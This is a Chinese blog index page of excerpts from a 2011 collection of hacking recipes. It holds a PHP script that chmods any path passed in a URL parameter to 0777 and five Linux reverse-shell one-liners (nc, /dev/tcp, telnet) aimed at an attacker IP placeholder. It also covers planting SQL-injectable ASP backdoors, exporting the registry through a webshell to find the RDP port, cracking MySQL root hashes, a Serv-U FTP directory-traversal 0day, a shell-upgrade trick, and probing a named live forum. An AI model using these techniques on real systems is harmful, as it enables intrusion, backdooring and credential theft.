=_=! - 博客园

linux不提权跨目录访问的代码

摘要： linux权限多设的比较松的其实，但有的虚拟机还是不能跨目录访问的。在提不了权的情况下，试试如下代码吧。运气好的话说不定就跨过去了。代码如下：<?php$path = stripslashes($_GET['path']);$ok = chmod ($path , 0777);if ($ok == true)echo CHMOD OK , Permission editable file or directory. Permission to write;?>把上面代码保存为tmdsb.PHP然后访问http://www.tmdsb.com/tmdsb.php?pa 阅读全文

posted @ 2011-12-30 09:15 =_=! 阅读(227) 评论(0) 推荐(0) 编辑

查找3389方法

摘要：不知道远程登录端口执行netstat -an一看太迷茫了那怎么办呢？读取注册表把 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp 的PortNumber 键值即可那么PHPshell 好像没有读取注册表这个功能aspshell 又不解析不过CND可以执行那就regedit /e D:wwwdata3389.reg “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp”执行完毕以阅读全文

posted @ 2011-12-22 22:58 =_=! 阅读(218) 评论(0) 推荐(0) 编辑

linux 五种反弹SHELL

摘要： 1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe 3. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 4. mknod backpipe p; telnet <attacker_ip> <port> 0&l 阅读全文

posted @ 2011-12-20 03:18 =_=! 阅读(567) 评论(0) 推荐(0) 编辑

利用“PHP彩蛋”进行敏感信息获取

摘要：关于“PHP彩蛋”的说法也许很多老PHPer已经都知道或听说了，好像是早在PHP4版本的时候就有彩蛋了，挺好玩儿的，可能近年来逐渐被人们遗忘了，其实彩蛋功能在PHP脚本引擎默认情况下是开启。下面就用Discuz官方论坛做一下测试：http://www.discuz.net/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42http://www.discuz.net/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42http://www.discuz.net/?=PHPE9568F36-D428-11d2-A769-00AA001A 阅读全文

posted @ 2011-12-15 17:18 =_=! 阅读(290) 评论(0) 推荐(0) 编辑

MySQL Root密码另类破解

摘要：提权时，当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时：停止mysql服务将下载的user.MYD user.frm user.MYI替换本地文件，然后cd mysql\binmysqld-nt --skip-grant-tables重新打开一个cmdmysql -u rootselect user,password from mysql.user; 阅读全文

posted @ 2011-12-13 12:10 =_=! 阅读(237) 评论(0) 推荐(0) 编辑

Serv-U FTP Jail Break（越权遍历目录、下载任意文件）

摘要： [*]----------------------------------------------------[*]Serv-U FTP Server Jail Break 0dayDiscovered By KingcopeYear 2011[*]----------------------------------------------------[*]/*通过构造..:/来遍历服务器目录，下载任意文件影响版本：6.4，7.1，7.3，8.2，10.5*/Affected:220 Serv-U FTP Server v7.3 ready...220 Serv-U FTP Server v7 阅读全文

posted @ 2011-12-13 12:08 =_=! 阅读(566) 评论(0) 推荐(0) 编辑

ssh登入不了，被拒绝的处理方法。

摘要： 1、service ssh start 开启ssh服务2、从实体机telnet 虚拟机的22端口，发现已打开，但是ssh还是上不去。3、sshd-generate之后生成密钥，再ssh发现顺利ssh 阅读全文

posted @ 2011-12-13 12:06 =_=! 阅读(2252) 评论(0) 推荐(0) 编辑

构造注入点后门代码

摘要： /**************************Mssql***********************/<!–#include file="conn.asp"–><%hid=request.QueryString("id")sql="select * from admin where id="&hidset rs=conn.execute (sql)%>/**************************Access***********************/<%db="a 阅读全文

posted @ 2011-12-13 12:04 =_=! 阅读(249) 评论(0) 推荐(0) 编辑

不能su交互的解决方法

摘要：用nst的反弹后门连上nc后不能su交互，报错如下：standard in must be a tty解决方法：python -c ‘import pty; pty.spawn(“/bin/sh”)’得到shell就可以su进行交互了。阅读全文

posted @ 2011-12-06 22:16 =_=! 阅读(838) 评论(0) 推荐(0) 编辑

补丁号

摘要： PR对应补丁号： KB952004巴西烤肉对应补丁号：KB956572 阅读全文

posted @ 2011-12-06 02:58 =_=! 阅读(366) 评论(0) 推荐(0) 编辑

天黑再动手